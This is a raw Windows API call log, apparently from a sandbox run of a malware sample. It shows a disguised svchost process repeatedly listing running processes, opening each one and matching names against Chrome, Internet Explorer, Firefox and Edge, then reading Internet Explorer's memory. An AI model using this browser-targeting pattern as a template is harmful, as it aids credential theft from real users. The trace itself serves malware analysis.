	[0213.125] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0213.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3fac
	[0213.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.125] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0213.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.126] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0213.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.126] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0213.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.126] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.127] NtQueryInformationProcess (in: ProcessHandle=0x3fac, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0213.127] ReadProcessMemory (in: hProcess=0x3fac, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0213.127] ReadProcessMemory (in: hProcess=0x3fac, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0213.127] ReadProcessMemory (in: hProcess=0x3fac, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0213.127] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0213.127] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0213.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3fb0
	[0213.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.128] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0213.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.129] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.129] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0213.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.129] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.130] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0213.130] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3fb4
	[0213.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.130] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0213.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.131] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.131] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0213.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.132] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.132] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3fb8
	[0213.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.133] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.133] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.133] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.134] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.134] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.135] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3fbc
	[0213.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.135] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.136] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.136] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.136] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.137] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0213.137] CloseHandle (hObject=0x188) returned 1
	[0213.137] Sleep (dwMilliseconds=0x64) 
	[0213.238] GetCurrentProcessId () returned 0x110
	[0213.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0213.241] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0213.242] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0213.243] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0213.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3fc0
	[0213.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.244] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.245] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.245] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.245] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.246] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.247] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3fc4
	[0213.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.247] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.247] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.248] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.248] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.248] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0213.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3fc8
	[0213.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.249] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0213.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.250] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.250] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0213.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.251] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.251] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0213.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3fcc
	[0213.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.252] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0213.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.253] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.254] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0213.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.254] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.254] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0213.255] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3fd0
	[0213.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.255] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0213.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.256] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.256] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0213.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.257] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.257] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0213.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3fd4
	[0213.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.258] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0213.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.259] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.259] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0213.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.260] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.260] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0213.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3fd8
	[0213.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.261] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0213.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.262] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.262] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0213.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.263] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.263] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0213.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3fdc
	[0213.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.264] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.264] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.264] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.265] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.265] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3fe0
	[0213.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.266] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.266] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.267] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.267] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.267] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3fe4
	[0213.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.270] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.270] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.271] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.271] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.272] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.272] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3fe8
	[0213.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.273] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.273] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.274] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.274] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.274] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3fec
	[0213.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.276] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.276] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.276] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.277] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.277] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.278] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3ff0
	[0213.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.278] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.279] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.279] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.280] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.280] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3ff4
	[0213.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.281] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.282] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.282] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.283] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.283] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.285] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3ff8
	[0213.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.285] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.286] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.286] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.286] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.287] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0213.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3ffc
	[0213.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.288] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0213.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.288] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.289] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0213.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.289] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.290] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4004
	[0213.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.291] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.291] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.292] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.292] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.292] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0213.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4008
	[0213.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.294] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.294] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
